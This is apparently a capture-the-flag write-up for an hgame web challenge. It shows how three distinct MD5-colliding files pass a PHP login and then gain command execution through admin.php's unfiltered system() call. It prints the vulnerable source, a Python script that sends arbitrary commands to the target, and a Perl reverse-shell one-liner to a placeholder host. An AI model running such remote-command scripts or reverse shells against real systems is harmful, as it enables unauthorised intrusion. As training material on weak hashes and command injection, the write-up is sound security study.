Haven't done challenges in a long time; a junior schoolmate sent me the hgame challenges, so I did a quick warmup.
An MD5 collision challenge.
A manual scan for backup files turned it up:
http://118.25.89.91:8080/question/.login.php.swp
<?php
session_start();
error_reporting(0);
if (@$_POST['username'] and @$_POST['password'] and @$_POST['code'])
{
$username = (string)$_POST['username'];
$password = (string)$_POST['password'];
$code = (string)$_POST['code'];
if (($username == $password ) or ($username == $code) or ($password == $code)) {
echo "Your input can't be the same";
}
else if ((md5($username) === md5($password)) and (md5($password) === md5($code))){
echo "Good";
$_SESSION["secret"] = 'hgame2019';
header('Location: admin.php');
exit();
} else {
echo "<pre> Invalid password</pre>";
}
}
?>
<html>
<head>
<meta charset="UTF-8">
<title>Login</title>
<link href="css/bootstrap.min.css" rel="stylesheet">
<!-- Matomo -->
<script type="text/javascript">
var _paq = window._paq || [];
/* tracker methods like "setCustomDimension" should be called before "trackPageView" */
_paq.push(['trackPageView']);
_paq.push(['enableLinkTracking']);
(function() {
var u="//118.25.89.91/piwik/";
_paq.push(['setTrackerUrl', u+'matomo.php']);
_paq.push(['setSiteId', '1']);
var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'matomo.js'; s.parentNode.insertBefore(g,s);
})();
</script>
<!-- End Matomo Code -->
</head>
<body>
<div class="container">
<div id="loginbox" style="margin-top:50px;" class="mainbox col-md-6 col-md-offset-3 col-sm-8 col-sm-offset-2">
<div class="panel panel-info" >
<div class="panel-heading">
<div class="panel-title">Sign In</div>
</div>
<div style="padding-top:30px" class="panel-body" >
<div style="display:none" id="login-alert" class="alert alert-danger col-sm-12"></div>
<form id="loginform" class="form-horizontal" role="form" method="post" action="">
<div style="margin-bottom: 25px" class="input-group">
<span class="input-group-addon"><i class="glyphicon glyphicon-user"></i></span>
<input id="login-username" type="text" class="form-control" name="username" value="" placeholder="username" autocomplete="off">
</div>
<div style="margin-bottom: 25px" class="input-group">
<span class="input-group-addon"><i class="glyphicon glyphicon-lock"></i></span>
<input id="login-password" type="password" class="form-control" name="password" placeholder="password" autocomplete="off">
</div>
<div style="margin-bottom: 25px" class="input-group">
<span class="input-group-addon"><i class="glyphicon glyphicon-qrcode"></i></span>
<input id="login-username" type="text" class="form-control" name="code" value="" placeholder="secret code" autocomplete="off">
</div>
<div class="input-group">
<div class="checkbox">
<label>
<input id="login-remember" type="checkbox" name="remember" value="1">Remember me
</label>
</div>
</div>
<div style="margin-top:10px" class="form-group">
<div class="col-sm-12 controls">
<input type="submit" name="login" value="Login" class="btn btn-success"/>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
<script src="js/jquery.min.js"></script>
<script src="js/bootstrap.min.js"></script>
</body>
</html>
The several === operators show how hardcore this challenge is 0rz
Because of the (string) cast, there is no way to bypass it with arrays and the like.
So I had to dig up a few articles and read through them slowly.
I found someone mentioning hashclash, an MD5 collision tool written based on Wang Xiaoyun's paper, so I downloaded it. But this tool has a few problems: it can only produce two files with the same hash, while here three are needed, so the next goal was to find a tool that can produce three or more files this way.
Then I found this:
thereal1024/python-md5-collision
Skimming the docs, gen_coll_test.py can generate about two hundred files with the same MD5, which solves the problem.
Straight into writing the script:
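Before sending anything, it is worth confirming that the files gen_coll_test.py produced really satisfy the login.php check: pairwise byte-distinct, but one shared MD5. The following Python is added here and is not part of the original writeup or the python-md5-collision project; it mirrors the PHP logic on raw bytes and validates a candidate set (the out_test_00N.txt file names are assumed, and the SHA-256 comparison is an addition showing that a stronger hash still tells the files apart).

```python
import hashlib
from pathlib import Path
from typing import Iterable, List, Optional


def login_check(username: bytes, password: bytes, code: bytes) -> str:
    """Mirror of the login.php branch logic on raw bytes.

    PHP casts each field to string, rejects any two equal fields, then requires
    all three MD5 digests to be identical (===)."""
    if username == password or username == code or password == code:
        return "Your input can't be the same"
    h_user = hashlib.md5(username).digest()
    h_pass = hashlib.md5(password).digest()
    h_code = hashlib.md5(code).digest()
    if h_user == h_pass and h_pass == h_code:
        return "Good"
    return "Invalid password"


def verify_collision_set(blobs: List[bytes]) -> Optional[str]:
    """Return the shared MD5 hex digest if every blob differs from the others
    yet all share one MD5, otherwise None.

    Also requires SHA-256 to distinguish every blob: the whole point is that
    MD5 equality is not input identity, a stronger hash still separates them."""
    if len(blobs) < 2 or len(set(blobs)) != len(blobs):
        return None
    md5s = {hashlib.md5(b).hexdigest() for b in blobs}
    sha256s = {hashlib.sha256(b).hexdigest() for b in blobs}
    if len(md5s) != 1 or len(sha256s) != len(blobs):
        return None
    return md5s.pop()


def load_collision_files(paths: Iterable[str]) -> List[bytes]:
    """Collision files are binary; always read them as bytes, never as text."""
    return [Path(p).read_bytes() for p in paths]


if __name__ == "__main__":
    # Assumed output names of gen_coll_test.py (not part of the original page)
    files = [f"out_test_{i:03d}.txt" for i in range(3)]
    blobs = load_collision_files(files)
    print("shared md5:", verify_collision_set(blobs))
    print("login.php would answer:", login_check(*blobs))
```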
# -*- coding:utf-8 -*-
# __Author__:berTrAM
import sys
import requests

url = "http://118.25.89.91:8080/question/login.php"
admin_url = "http://118.25.89.91:8080/question/admin.php"
# The three colliding files from gen_coll_test.py are raw bytes, so read them in binary mode
username = open('out_test_000.txt', 'rb').read()
password = open('out_test_001.txt', 'rb').read()
code = open('out_test_002.txt', 'rb').read()
data = {'username': username, 'password': password, 'code': code, 'remember': '1', 'login': 'Login'}
s = requests.Session()
# A successful login sets $_SESSION["secret"] and redirects to admin.php; the session cookie is kept by s
rs = s.post(url, data=data)
s.get(admin_url)
# admin.php only checks isset($_POST['submit']), so the submit value itself does not matter
data2 = {'command': sys.argv[1], 'submit': '提交'}
rs2 = s.post(admin_url, data=data2)
# Everything after the "Result is :" marker is the command output
print(rs2.text[rs2.text.find("Result is :") + 11:])
#perl -e 'use Socket;$i="x.x.x.x";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
After finishing the first part of the script, I found that the backend hands out a shell directly.
Went ahead and cat admin.php
Pulled down the source:
<?php
session_start();
error_reporting(0);
?>
<head>
<!-- Matomo -->
<script type="text/javascript">
var _paq = window._paq || [];
/* tracker methods like "setCustomDimension" should be called before "trackPageView" */
_paq.push(['trackPageView']);
_paq.push(['enableLinkTracking']);
(function() {
var u="//118.25.89.91/piwik/";
_paq.push(['setTrackerUrl', u+'matomo.php']);
_paq.push(['setSiteId', '1']);
var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'matomo.js'; s.parentNode.insertBefore(g,s);
})();
</script>
<!-- End Matomo Code -->
</head>
<?php
if ($_SESSION["secret"] === 'hgame2019')
{
?>
<form action="" method="post">
Private Terminal <input type="text" name="command"><input type="submit" name="submit">
</form>
<?php
if($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['submit'])){
$cmd = (string)$_POST['command'];
echo "<p>The Command is : $cmd </p>";
echo "</br>";
$cmd = str_replace("flag",'none',$cmd);
echo "<p>Result is :";system($cmd); "</p>";
}
}
else {
echo "<script>alert('Login First')</script>";
header('Location: login.php');
exit();
}
?>
Found that the flag can't be read directly, so used perl to pop a reverse shell.
getflag